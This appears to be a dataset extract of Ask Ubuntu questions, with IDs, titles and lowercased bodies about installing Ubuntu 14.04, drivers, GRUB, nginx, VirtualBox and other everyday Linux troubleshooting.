file `` /usr/share/gnome-schedule/at.py '' , line 514 , in read array_or_false = self.parse ( line ) file `` /usr/share/gnome-schedule/at.py '' , line 174 , in parse if script [ -1 ] == `` \n '' : indexerror : string index out of range
480921	how to install canon ip1980 printer to ubuntu 14	i try to install my printer canon ip1980 . but it failed . it did n't recognize my printer . hope you can help me with this .
480922	recent version of libpng	the libpng in the ubuntu 14.04 is still at version 1.2 . is there an alternative apt source that contains more recent version ? if not , will i end up in trouble aka dependency hell if i compile my own and install it /usr/local ? that is , which version will it take when loading programs .
480925	ubuntu not mounting brand-new external drive	i bought a brand new 3tb external drive for my birthday coming up , it 's a wd my book , it came as ntfs , and i 'm trying to make it mount using a simple script on boot . ( not /etc/fstab , i ruined my comp . using that by accident and had to re-install ) . i 'm instead having a script run in /etc/init.d . the thing is , it 's under /dev/sdf and i want it to mount in /exhd , the script seems to run , but it does n't mount it . any help here , please ?
480927	can not use keyboard on unity	dear ubuntu community , currently i am using ubuntu 14.04 , and few hours ago , an update notifier prompted to install an update . after update finished , it ask for system restart , i think there is some kernel update etc . the problem start after restart , i can type password when login , but after entering unity desktop , my keyboard become suddenly unusable , system does n't respond to any key press , after few minutes , it lock the screen automatically , but still i ca n't type password to unlock the screen . i tried to logout ( mouse is working properly ) , and login again , try starting onscreen keyboard , but still have no luck , system still does n't respond to the key press . i tried to login in console , and keyboard working well , tried to install xfce , and keyboard also working properly , keyboard also working properly when login to unity as guest , it only not working when i login using my account . i also try to reset unity config via unity-tweak-tool -- reset-unity , but still no luck any suggestion to resolve this ?
480928	`` ubuntu one discontinuing '' annoying message	good day , people it 's been 8 days since the announced discontinuation of ubuntu one , which i 've never used at all , but i 'm still receiving the notice for `` june 1st discontinuation '' every time i boot up my 12.04 . will that message ever go away ? thanks .
480935	finish long directory name with tab problem	i have simple problem that i have to long directories which i want to cd into , but i would like to know easy way . mosquito @ mosquito-k56cb : ~/downloads $ ls | grep guns guns n ' roses - appetite for destruction ( japanese edition ) 1987 guns n ' roses - use your illusion i 1991 of course i can just copy the name and put it like this : cd `` guns n ' roses - appetite for destruction ( japanese edition ) 1987 '' but why when i write cd guns then tab , it finishes line into : cd guns\ n\'\ roses\ -\ then by my understanding i should just start writing app.. with tab and it should finish whole name , but it does not . and hitting tab twice does not show me anything either . what i am missing here ?
480940	dell inspiron 5537 hungups during boot	i purchased a inspiron 5537 with ubuntu preinstalled . starting the lap-top , i followed all the instructions for ubuntu . at the end i decided to accept all the proposed updates in ubuntu . now the system hungups during boot and never goes to desktop . is there any way to recover that problem ? ? ?
480941	can not find -lqtmultimedia	using qtcreator with qt 4.8 i need qt += multimedia in my pro.file i have already installed qtmobility-dev . still my multimedia package is not found . why ?
480947	mysql ssh connection setup	i want to connect to a mysql db ( running ubuntu 14.04 ) with my mac ( running mavericks ) . i will be connecting remote- home to work . how do i setup the ssh connection on mysql workbench ? also , where do i find the values for the fields below ? these are required for workbench connection . 1 . ssh hostname 2 . ssh username 3 . ssh password 4 . ssh key file 5 . mysql hostname so far : i have created a separate user , aside from root and granted+flushed privileges . a port forwarding rule for port x ( as listed in the my.cnf file ) has been setup via my router . does a port forwarding rule for port 22 for ssh also need to be setup on the router ? are any steps missing ?
480953	dropbox help please	i downloaded dropbox to back up my desktop pc when the fantastic ubunu one closed . ubuntu one automatically uploaded all new files as well as changes to any existing files . im not too sure how dropbox works because when i add data to an existing file on my pc it does not appear to be updated by dropbox . does dropbox upload all new files and changes to files automatically or do i have to remember to upload after creating a new file or changing an existing one . thanks
480956	error during heasoft installtion	i am trying to installing the software called heasoft6.13 in ubuntu 14.04 lts . i am using the source code and it configured successfully ( using ./configure command ) . in the next step , i tried to run the command make , it showed the following error . if anyone could point out what went wrong ? thanks in advance make [ 8 ] : [ tclreadline.lo ] error 1 make [ 8 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk /tclreadline' make [ 7 ] : [ subdir-tclreadline ] error 2 make [ 7 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 6 ] : [ build-tclreadline ] error 2 make [ 6 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 5 ] : [ hd-std-all-subdirs ] error 2 make [ 5 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 4 ] : [ all-subdirs ] error 2 make [ 4 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 3 ] : [ hd-std-all ] error 2 make [ 3 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 2 ] : [ all ] error 2 make [ 2 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/tcltk/build_dir' make [ 1 ] : [ tcltk ] error 2 make [ 1 ] : leaving directory `/home/jithesh/softwares/xraysoft/heasoft-6.13/build_dir' make : [ all ] error 2
480960	how can i create a script that allows all users to change network connections ?	i want to create a bash script to enable all users to connect to wireless networks . following the instructions on this page , i can set that and it works . however , i want to be able to do this more quickly by running a script . i considered using sed like this sudo sed -i `` s/auth_admin_keep/yes/g '' /usr/share/polkit-1/actions/org.freedesktop.networkmanager.policy but in this file , there are two instances of auth_admin_keep and i only want to replace the first one . i do n't want the script to replace the second one even if i accidentally run the script twice .
480964	i ca n't find my hdd ( hard disk )	i have installed ubuntu removing windows 7 . now i ca n't find my hard disk drive . i tried these command . sudo fdisk -l it shows me there are 3 hard disk named : dev/sda1 , sda2 , sda5 . but when i open dev and try to open i see that is like a text file . that file is sda2 : block special i am using ubuntu 14.04 . i would appreciate your help .
480968	tomboy notes are n't searchable from dash	i installed tomboy and created an example note . trying to search both the title ( first line ) and the content did n't give any results . i was expecting the notes to show up after searching for them , because there is a dash plugin specifically named 'tomboy ' that is supposed to enable just that . is there something i am missing ? any additional lenses i should enable , or tabs i should look into ? this is the screenshot of the plugin ( down below , in the 'dash plugins ' section ) :
480969	virtual filesystem acting as a clone+difference of a master filesystem	at my company about 10 devs share an ubuntu dev server . we have separate code directories , but due to our database size ( about 50 gb ) , it is n't practical to clone the mysql database for each developer . so right now , we are all sharing a single database . however , i was wondering if this is possible : create a master filesystem ( ext4 ) that stores the 50 gb database . this filesystem would not have a mysql server running on it and would be in-practice read-only . create a virtual filesystem for each dev that references the master filesystem and stores a diff of each change to it . have a mysql server running on each virtual filesystem . then , each developer gets his own database to do whatever he wants with , while not needlessly duplicating the 50 gb database . i have n't looked at how mysql stores its data on the disk , but due to the desire to minimize disk i/o , i suspect that the small changes that we make in our routine testing wo n't create a huge diffs in the virtual filesystem . specifically , these are my questions : is this architecture possible ? is this the easiest way to accomplish my goal ? does such a virtual filesystem already exist ?
480970	unable to locate package cedarview-drm	$ sudo apt-get install cedarview-drm libva-cedarview-vaapi-driver cedarview-graphics-drivers reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cedarview-drm e : unable to locate package libva-cedarview-vaapi-driver e : unable to locate package cedarview-graphics-drivers . $ uname -m i686 why ca n't i find these `` cedarview-drm packages '' ?
480975	is there an android emulator for ubuntu 14.04 ?	preferably one that works properly , like blue stacks on windows.. thanks
480978	remote network access control	i 'd like to know which software/process would help me do the following : i 've got two offices ( a & b ) in which i will install ubuntu 14.04 on their respective desktop pcs . both offices would have separate internet access ( via ethernet/wifi from a 'regular ' modem ) . i 'd like to : 1 . set up the browser on desktop b such that it needs a password to browse the internet . 2 . be able to set the time limit for each of those sessions . 3 . at the end of that session time out , change the password needed for the next login ( of course ) . what software is needed and how do i go about setting it up ? i 've thought of perhaps using teamviewer and remotely controlling the desktop . so once i get an employee to fire up teamviewer on b for me , then from desktop a , i input the browsing password . so no need of setting up time-out sessions or changing passwords . does that sound doable ? if so , then i just need advice on how to setup password to restrict access to , say , firefox . then , there would be no need of setting up proxies ( yay ! ) much thanks to all you geniuses . p.s . : -i 'm absolutely new to ubuntu ... . -desktops a & b are in very different locations ... . -the employees are not knowledgeable enough to figure out a hack , so the process need n't necessarily be too complex
480987	convert custom ubuntu 14.04 build into distribution usb	the idea is to give friends and acquaintances , who ca n't afford to replace their pcs , an alternative based on ubuntu 14.04 lts with most of the configuration processes already sorted out , therefore i need a custom build . using the standard ubuntu-14.04-desktop-i386.iso i have installed ubuntu 14.04 lts 32-bit as a virtual machine under vmware fusion on a mac . i have now customised this build to include a collection of apps and settings suitable for novice users . what i 'd like to do is to generate a usb stick and/or a dvd that can be used to trial ( live boot ) and install a copy of this custom build on old pcs to replace defunct versions of windows ( either obsolete , e.g . win xp or simply damaged beyond repair , e.g heavily infected win vista ) ! i 've followed various articles both here and elsewhere but seem to keep going backwards â i want to do z , fine but first do y ; i want to do y , fine but first do x ; etc . i seem to be installing all sorts of utilities but end up getting further away from a solution ! please can someone guide me in the right direction !
480988	installer crashed on asus zenbook	it just crashed and offered to report a bug . which i did https : //bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/1328175 . after that , i restarted and everything seems to work properly so far . if anyone knows to read this reports i would like to know more about the problem . what is it ? should i continue to use system as is ? do i have any alternative installers or workarounds ?
480989	error gnu grub version 2.02 beta 2-9 while booting from usb	i have a sony vaio f14212 with windows 8 pre-installed ( 64 bit ) . later , i upgraded to windows 8.1 . i installed ubuntu 14.04 along with windows 8.1 in dual boot . unfortunately , i deleted ubuntu drive from hard disk . later i deleted swap and root drives with home drive . now when i tried to install ubuntu 14.04 again , the usb is not booting . i tried all options from boot menu but still it is not working . when i am booting from usb , it is showing an error : gnu grub version 2.02~ beta 2-9 [ minimal bash-like line editing is supported for the first world , tab lists possible command completions.anywhere else tab lists the possible completions of a device/filename ] grub > i need to do a project on ubuntu . please help me to solve this issue .
480990	ubuntu 14.04 will not install !	i am trying to install ubuntu 14.04 on my laptop . a clean install with a blank hard disc . the install always stops partway through with the screen saying `` configuring bcmwl-kernel-source '' . i have tried both the 64-bit and 32-bit versions , both via dvd and usb stick with the same result . the laptop does not hang , the cursor moves and i can scroll back and forth through the welcome screens , but there is no hard disc or dvd activity , even after several hours . the laptop has an amd turion64 processor and 2gb of memory . does anybody have any suggestions please ?
480993	ubuntu erased my windows when i chose to replace old ubuntu install	i was installing ubuntu 13.10 and chose to replace the old ubuntu 12.04 . the problem is that the new installation also erased my windows and installed the new ubuntu using all space available in my hd , instead of keeping the dual boot . that also happened with my friend , we are both developers that need both os . very sad , this should be fixed . edit : as @ oldfred said : `` reinstall says overwrite ubuntu but it also erases existing windows . bugs.launchpad.net/ubuntu/+source/ubiquity/+bug/1265192 ''
480997	maas dhcp server setup , pxe to1 tftp file not found	i am setting ubuntu 14.04 maas cluoud . i have setup the region and cluster controller . for some reason , maas was not running dhcp even though ( 1 ) maas-dhcp and maas-dns were installed , and ( 2 ) added a new interface ( eth0 ) with managed dhcp and dns . so , i was forced to use isc dhcp server with manual configuration for eth0 dhcp server seems to be running . correct outputs are being printed out for `` ip route '' . when i do , `` ps –ef | grep –i dhcp '' , it says its running . for some reason , when i do sudo maas-probe-dhcp eth0 , i get `` no dhcp servers detected '' when i put in ubuntu server installation cd on new node to be added , network configuration succeeded i can see its talking to dhcp server . getting ip address..i even tried ubuntu desktop cd ... not connected to internet . ping google.com fails . problem a : is my dhcp server running successfully ? what 's causing the above issues ? how can i fix the same ? problem b : on new node to be added , pxe boot fails . error messages are.. pxe-to1 : file not found pxe-e3b : tftp error - file not found pxe-m0f : exiting intel boot agent . any suggestions are appreciated . thanks
481002	how to install nuget addin for monodevelop ?	i 'm trying to install the nuget package management addin for monodevelop but i 'm lost on how to do it . can someone help me get it installed ?
481003	14.04 running slow in virtualbox . enabling 3d acceleration caused os to crash on login	i 'm using virtualbox on my computer at work , with windows as the host os and ubuntu as the guest . ubuntu , inside of vb , is extremely slow . a quick google showed me this was a common problem with a somewhat easy fix : install guest additions and enable 3d acceleration . i had already installed guest additions previously , but i went ahead and ran through the process again just to make sure everything was up-to-date . i then shut down my vb instance and enabled 3d acceleration in the settings . after doing that , however , i hit my big problem . i started up my instance of ubuntu , but as soon as i logged in the instance crashed . this happens upon login every time . i went back and unchecked the box for 3d acceleration , and the instance began working again ( at the same slow pace as before ) . any ideas what could be causing the crash ? could i not have enough ram reserved for the vb ? would that cause this issue ? i 'm also open to suggestions for a different vb that wo n't have this problem .
481004	nginx downloading php file only if .php is in the url	i know this is a popular question but i have n't found anyone with my similar issue . i can serve php files as long as the .php extension is not in the url . for example : if i go to localhost i am served my index.php file . if i go to localhost/index.php i download the file . here is my config : server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /usr/share/nginx/html ; index index.php index.html index.htm ; # make site accessible from http : //localhost/ server_name localhost ; location / { # first attempt to serve request as file , then # as directory , then fall back to displaying a 404. try_files $ uri $ uri/ =404 ; # uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } # only for nginx-naxsi used with nginx-naxsi-ui : process denied requests # location /requestdenied { # proxy_pass http : //127.0.0.1:8080 ; # } error_page 404 /404.html ; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html ; location = /50x.html { root /usr/share/nginx/html ; } # pass the php scripts to fastcgi server listening on 127.0.0.1:9000 # location ~ \.php $ { fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; include fastcgi_params ; } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # location ~ /\.ht { deny all ; } } i am quite confused by this issue and i am wondering if anyone has experience in the matter .
481007	every reboot alternatives for x86_64-linux-gnu_gl_conf and i386-linux-gnu_gl_conf are dropped to mesa	that is . i 've removed nvidia drivers with running nvidia-installer.run -- uninstall , rebooted , installed fglrx , rebooted again and found that amdconfig is not found . i 've googled the solution and tried to do sudo update-alternatives -- auto i386-linux-gnu_gl_conf sudo update-alternatives -- auto x86_64-linux-gnu_gl_conf then i checked the result with update-alternatives -- get-selections | grep gl_conf and everything was fine . but after reboot i see again that both alternatives are set to mesa again : i386-linux-gnu_gl_conf manual /usr/lib/i386-linux-gnu/mesa/ld.so.conf x86_64-linux-gnu_egl_conf auto /usr/lib/x86_64-linux-gnu/mesa-egl/ld.so.conf x86_64-linux-gnu_gl_conf manual /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf i 've found the /var/log/alternatives.log and see that something explicitly sets these links during the boot : update-alternatives 2014-06-09 18:37:50 : run with -- auto i386-linux-gnu_gl_conf update-alternatives 2014-06-09 18:37:57 : run with -- auto i386-linux-gnu_gl_conf update-alternatives 2014-06-09 22:39:28 : run with -- set x86_64-linux-gnu_gl_conf /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf update-alternatives 2014-06-09 22:39:28 : status of link group /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf set to manual update-alternatives 2014-06-09 22:39:28 : link group x86_64-linux-gnu_gl_conf updated to point to /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf update-alternatives 2014-06-09 22:39:38 : run with -- set i386-linux-gnu_gl_conf /usr/lib/i386-linux-gnu/mesa/ld.so.conf update-alternatives 2014-06-09 22:39:38 : status of link group /etc/ld.so.conf.d/i386-linux-gnu_gl.conf set to manual update-alternatives 2014-06-09 22:39:38 : link group i386-linux-gnu_gl_conf updated to point to /usr/lib/i386-linux-gnu/mesa/ld.so.conf how can i determine what does that ? maybe some part of nvidia driver was not correctly removed with -- uninstall ?
481009	unable to install specific package version with apt-get	i am trying to run the following command to install a specific version of libssl : apt-get install libssl1.0.0=1.0.1-4ubuntu5.13 as of right now , the latest version is 1.0.1-4ubuntu.14 , but i want the earlier version until i can do some testing with the new one . however i get the error : '' e : version '1.0.1-4ubuntu5.13 ' for 'libssl1.0.0 ' was not found if i run the same command for 1.0.1-4ubuntu5.14 , it works . so , i figure maybe i need to add a repository in /etc/apt/sources.list , but i do n't which repository might have what i need , or what entry to make .
481010	adding a border to gnome-terminal	on a new 14.04 plain vanilla ubuntu install , with the defauld theme , nothing special . bring up a gnome-terminal window ( ctrl + alt + t ) the terminal window has no border ( nor does it have a resize handle btw ) it 's a black rectangle . how can i add a 1px white border ( which i find useful when dealing with multiple overlapping gnome-terminal windows ) ? thanks !
481012	huawei e173 on ubuntu 12.04 need reinstall after every day	my huawei e173 on ubuntu 12.04 works well . i configure the network connection profile , it is detected , and connects again after every computer reboot within the same day . however , after 24 hours it never connects again . the modem is recognized , but it does not connect to the mobile network . it 's like if the pin was wrongly entered . further , the network-manager crashes with an error . the only way to get it working again is by deleting the mobile nerwork profile , then connect the dongle again to the usb port , click on the new network that appears and configure it as a new profile , then itr works and connects again for 24 hours more . it looks to me like there is some permissions conflict , between pin , user access level , etc , that after 24 hours makes the pin become outdated or some security issue blocks it . tried many things but no way , everytime i have to reinstall it . any suggestion very welcome ... ..
481014	how to install www : :mechanize : :firefox and mozrepl : :remoteobject ?	i want to use www : :mechanize : :firefox . trying to install it via cpan one dependency not ok ( mozrepl : :remoteobject ) ; additionally test harness failed trying to install mozrepl : :remoteobject will not be installed cos of failed tests ... . of course i have installed mozrepl plugin in ff .
481017	could touchpad-indicator be conflicting with dropbox ?	ok , i 've done a fair bit of searching on this topic , and while i 've found several similar situations , i ca n't find any information on my specific issue . i 'm running a relatively new/clean installation of 12.04 on a lenovo ideapad . i 'm a low- to mid-level ubuntu user ; i 'm comfortable playing around a little in the terminal as long as i have fairly solid guidance . i have very little `` extra '' stuff installed ; this is primarily an internet/email/libreoffice machine . one item that i absolutely love is touchpad-indicator from atareao-team . it does exactly what i want ( disable the touchpad when i plug in a mouse , enable the touchpad when i unplug a mouse ) . but , with touchpad-indicator , i can not get dropbox to work correctly . i have tried every dropbox install workaround trick i can find , but no matter what , there 's always a problem . the main issue is that i do n't get the dropbox icon or the accompanying menu , which makes it difficult to confirm whether or not i 'm getting files . ( i use a shared dropbox account to share files between a number of fellow employees , so i do n't always know if/when something is being changed or added . ) if i remove touchpad-indicator , then i can install dropbox correctly . while their functionality is completely different , they both rely on having a small menu in the panel , so my guess is that there 's something causing a little conflict there . another side note , i also have an account with copy , and that works just fine in the panel with either touchpad-indicator or dropbox . surely , i 'm not the only person attempting to use both touchpad-indicator and dropbox ? any insight would be welcome .
481018	ssh to a pc under mobile network	my friend is using internet using mobile internet ( airtel ) . i want to ssh to his pc . i know his ip address and the name servers of his network . how can i ssh to his pc ?
481019	asus ux31 ultrabook suddenly shuts down when below 50 % battery	i 've heard over the years that this computer had issues with the bios settings but that by 13.10 it had been cleared . it never used to happen on 13.10 but now that i 'm on 14.04 it started showing these symptoms . what happens exactly is that on battery power it will work normally until near 50 % then it either shuts down spontaneously or it freezes and the fan goes crazy until crashing . plugged in , it does n't experience any problems . it 's not a heat problem because of this since i run it at full power plugged in and no issues arise . i tried looking in the logs but do n't know exactly what to look for . i think that may be a good place to start but other than that , has anyone else seen this behavior or know how to fix it ? what other specs would be useful ? bios according to dmidecode -s bios-version : ux31e.210
481020	ubuntu 14.04 - everything fine except the shutdown	i 've installed ubuntu 14.04 on my old notebook ( acer travelmate 2420 ) . everything is fine except the shutdown . it 's hanging in the last screen ( `` ubuntu '' with the points beneath - they change their colour properly . as long as i do n't press the `` on/off '' button of the notebook ) . i 've changed this line : grub_cmdline_linux_default= '' quiet splash '' into this : grub_cmdline_linux_default= '' quiet splash acpi=force '' it does n't work . can anybody help ? i 'm a ubuntu beginner , so i maybe do n't understand too specific things .
481022	compiling old versions of r ( 2.11 or older ) on ubuntu 13.10 ( or newer ) ?	i am trying to compile an old version of r ( 2.11.1 , specifically ) . `` why ? `` , you might ask . well , i have a program i am trying to run ( that was not written by me , but i am hoping to use in my research ) that was written in `` old '' r , and the program writer has specifically mentioned that r-2.11.1 or older must be used . i have run ./configure with no obvious errors ( the entire output being far too long to post here , but i have been warned that i can not make pdf , dvi , or html versions of the help pages , which i 'm not too concerned about ) . next , when i pass the make command , i am met with the following error ( after a long stream of successful commands ) : warning in solve.default ( rgb ) : unable to load shared library '/home/sbowerma/programs/r-2.11.1/modules//lapack.so ' : /home/sbowerma/programs/r-2.11.1/lib/librlapack.so : undefined symbol : _gfortran_compare_string error in solve.default ( rgb ) : lapack routines can not be loaded error : unable to load r code in package 'grdevices' execution halted however , i have confirmed that the library lapack.so is , in fact , in the exact position it is supposed to be .
481023	text is not appearing at cursor in bash , can i reset it somehow ?	this happens sometimes if the vm bumps up against upper limits of memory and has to hit swap heavily for extended periods ( a few minutes or more ) . when this happens and i type asdf at the prompt it looks like : $ no command 'asdf ' found , did you mean : command 'asdfg ' from package 'aoeui ' ( universe ) command 'sadf ' from package 'sysstat ' ( main ) command 'sdf ' from package 'sdf ' ( universe ) asdf : command not found $ note that asdf is n't showing up after $ . the obvious answer is to just kill the tab and start a new one . still , i have to wonder if there 's a way to reset a bash terminal that is misbehaving like this . i tried bash and it did n't make any difference .
481024	display or system monitor do not wake up	i 've dell inspiron with kubuntu 14.04 . when close the lid and open it again it remain blank . as in power management i 've set `` when lid closed '' to `` do nothing '' . and it do not respond any key i press . then i 've to restart the my laptop .
481029	ca n't adjust resolution on a virtual ubuntu 14.04	i have recently created an ubuntu virtual machine , but the resolution is way off , and i am not able to change it to a more appropriate size . my host machine is a macbook pro running 10.7.5 with a 1280x800 resolution . my virtual machine is running ubuntu 14.04 and everything except the resolution is working fine . the resolution is not just `` not ideal '' but it is impossible to work with at 640x480 . i have researched a lot and looked all over askubuntu , but none of the answers i have found work for me . and i do have guest additions installed . what i have tried this seems to be a very informative and exhaustive answer , yet none of the solutions he has offered have worked for me . 1 . use mouse to adjust screen size adjusting the screen by resizing the virtual box windows with the mouse allows for any screen resolution up to the host screen resolution . i have tried that but the resolution remains the same and gray bars are added around the outside of the window . 2 . use predefined standard screen sizes if you need a fixed ( standard ) resolution you may also choose system settings - > monitors ( for 11.04 ) or displays ( for 12.04 ) for a selection of fixed resolutions ( here shown for 12.04 ) : for maximum host screen resolution you will need to run virtual box in fullscreen mode ( host + f ) for a fixed host screen resolution we need to disable auto-resize guest display ( host+g ) from virtual box manager view menu . 1 : the only option i have is 640x480 . 2 : when i go to fullscreen , it just makes the gray bars larger without affecting the resolution . 3 : auto-resize guest display is grayed out and i am unable to disable it . host+g also does nothing . 3 . define new geometry with xrandr if you need a fixed geometry that is not in the list of resolutions for monitors you will have to use xrandr to define a new resolution : first we use gtf for calculating the modeline of possible resolutions : gtf < xres > < yres > < refresh > [ -x ] give the desired values for x-resolution , y-resolution and refresh rate . the flag -x is default and can be omitted . for a portrait resolution 480x640 at 60 hz you will get the following output : $ gtf 480 640 60 -x $ 480x640 @ 60.00 hz ( gtf ) hsync : 39.78 khz ; pclk : 24.82 mhz modeline `` 480x640_60.00 '' 24.82 480 504 552 624 640 641 644 663 -hsync +vsync from this we can copy & paste the modeline to add it to xrandr list of known resolutions : xrandr -- newmode `` 480x640_60.00 '' 24.82 480 504 552 624 640 641 644 663 -hsync +vsync and add this for the virtual box monitor : xrandr -- addmode vbox0 480x640_60.00 replace vbox0 with the appropriate monitor if you have setup virtual box with multiple monitors ( or any other output name the driver reports ) . we can now switch to the newly defined geometry as described above ( 2. ) . i have done as he said ^ there . here is what i wrote in the terminal and what the terminal said back . virtualbox : ~ $ cvt 1280 800 # 1280x800 59.81 hz ( cvt 1.02ma ) hsync : 49.70 khz ; pclk : 83.50 mhz modeline `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync virtualbox : ~ $ xrandr -- newmode `` 1280x800 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync xrandr : failed to get size of gamma for output defualt virtualbox : ~ $ xrandr -- addmode default 1280x800_60.00 xrandr : failed to get size of gamma for output defualt xrandr : can not find mode `` 1280x800_60.00 '' any help would be appreciated , i 'm pulling my hair out over this !
481034	wallch not starting randomly on startup on ubuntu 14.04	been trying to get wallch to start automatically on random mode by using the settings but it does n't seem to work . could n't find much else online . what 's the status of this feature and if it does n't work , is there a hack for it ?
481039	howto prevent grubpc 2.02 to display with submenu ?	in the past , we could tweak grub-pc so that it simply shows all oses/options as a simple list , slightly editing /etc/grub.d/10_linux . how can we do that in the 2.02~beta2-9 release supplied with trusty tahr 14.04 ? with several kernels installed ( eg generic and lowlatency ) submenu is boring with such a /etc/default/grub when i need to change os : grub_default=saved grub_savedefault=true grub_timeout=3 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' acpi_osi=linux '' grub_cmdline_linux= '' '' thank you
481040	can ubuntu phone run on lg optimus l9 p769	my goal is to install ubuntu touch on my stylish 4.5 '' in . phone . if you know how to , please write it here as detailed as possible . i want everyone to read this to install on their phone . thanks again !
481041	ssd drive reserved by w8 ?	i have a dualboot setup as described at http : //askubuntu.com/a/228069/149354 . i want to take advantage of the ssd drive on ubuntu without messing up windows 8.1 . all systems are on /dev/sda ( including /boot/efi ) and the solid-state drive appears on /dev/sdb in two `` unknown '' type partitions in gparted -- is it safe to format these and how to best make use of them on ubuntu ?
481043	downloaded 64 bit , no iso ?	i 've recently installed the newest download , and i ca n't find the iso anywhere to put onto usb ( in my case , a hard drive ) . here 's what the download file looks like ; any help would be much appreciated !
481045	unable to install cedarview-graphics-drivers	$ sudo apt-get install cedarview-graphics-drivers reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cedarview-graphics-drivers : depends : xserver-xorg-core ( > = 2:1.10.99.901 ) depends : xorg-video-abi-11 e : unable to correct problems , you have held broken packages . please advice .
481047	error flash chrome in ubuntu 14.04	everything was going perfectly but one day , it stop working . from this day , i can neither play any games in the navigator chromium , and too not can see videos on line ( youtube ) anybody may help me ? i make all , about this problem ... . pepperflash , remove and reinstall , update , reinstall adobe flash player ... any all i see in blogs , tags , newsletters ... however , firefox , works perfect¡¡¡ thank you for all xoan anton piñeiro dios
481049	ubuntu 14.04 liveusb boot screen graphic errors	i am trying to install ubuntu 14.04 on my lenovo y500 laptop . it came preinstalled with windows 8 . i want to install it in a separate partition with a usb drive . i have tried both unetbootin and universal usb installer . but for some reason the screen after booting is crappy . the screen goes blank after selecting try ubuntu or install . if i try with nomodeset option the screen only displays on a small strip on the top . which again is split into three . each seem to be identical . it is not decent enough to begin installation . the graphic card in my laptop is nvidia gt650m , if it helps . maybe the problem is related to that . can anyone help in fixing this error when installing ubuntu .
481050	tcp connection last activity or open timestamp	is there a way to get an open tcp connections latest activity timestamp or first open timestamp ? i am trying to recycle some tcp connections and i would like to do it fairly .
481052	teamviewer in `` client only '' mode	i have a remote pc with the teamviewer on it . i want to use my local teamviewer installation only for connecting to that remote pc , and i do n't want any services ( teamviewerd ) running on my local ubuntu 14.04 . i 've tried to disable the service by doing sudo teamviewer -- daemon disable but after that i 'm not able to connect to the remote pc , because teamviewer reports an error `` the teamviewer daemon is not running ! '' on start , and i 'm not able to access the gui . is there a way to connect to the remote pc with teamviewer with no teamviewerd running ?
481053	ca n't cancel the lubuntu shutdown screen	i 've bought a small 5 year old small netbook . i noticed that lubuntu runs great on it , as it does n't use much space/resources . but the problem is , my screen is just too small . whenever i press the shutdown icon , i go to the shutdown , logout , restart , ect panel but the cancel button is tucked away right where my screen seems to end . i ca n't go back , it forces me to use an option besides canceling , which i ca n't reach with my mouse.is there any way to change this so i get access to the whole screen . the rest seems to be showing just fine , like the launchbar , which is cleary visible and useable . another thing that bugs me is that whenever i start up , i get an error along the lines of `` conflict detected with stolen region '' . i read that it has something to do with graphics but i have no idea how to get rid of it . the error does n't seems to cause any trouble as far as i can see , but it 's annoying .
481054	how do i get a broadcom bcm4312 working on a dell xps m1330 ?	i have installed ubuntu 14.04 on my laptop . when i plug in the ethernet cable the internet works fine , but i ca n't see any wireless network in the networking manager . the wifi switch is definitely on on my laptop ! it 's a dell xps m1330 . [ edited : the network card is broadcom corporation bcm4312 802.11b/g ] nm-tool gives me this : networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : 00:23 : ae:28 : fe : a2 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.26 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254
481055	reading partition start and end in testdisk	i 'm using testdisk in an attempt to recover a partition gone terribly awry . identifying the partition in question should simply be a matter of simply recognizing the location in the disk that it occupies . since i know the location of the partition in question from gparted , i need to translate that over to the format that testdisk uses , which i ca n't quite figure out . gparted gives the first and last sectors as follows : first sector : 1708032 last sector : 54637719 total sector : 52929688 test disk gives the partitions in the following way : start : 1691 110 20 end : 4986 39 5 size in sectors : 52929688 my question is : how do i translate the location specified in gparted to that in testdisk ? see the following image for any contextual clarification you might need :
481056	ubuntu 14.04 vlc subtitles - will not attach ( unable to drag/drop or upload while viewing )	i 'm new to ubuntu and a long time user of vlc with the windows os . in windows , i was able to drag and drop the .sfv file onto the playing video and the subtitles would be enabled . in ubuntu i try to drag and drop the .sfv file and it acts as though the .sfv file is a video and stops the actual video from playing . when i try to attach the .sfv file ( view - subtitles - select text subtitles ) i 'm able to see the .sfv file i 'd like to attach/open , although once i click open the file does n't attach itself to the video . does anyone know how to help me with this situation ? i 'm 2 seasons deep into breaking bad and attempting to read the body language of the characters during the spanish parts has gone on way too long .
481057	what are the advantages and disadvantages of always running ubuntu in `` try '' mode ?	i do n't want to lose everything on my windows , can i just not install it and always `` try '' ubuntu ? what are the disadvantages ? what are the advantages ? thanks in advance .
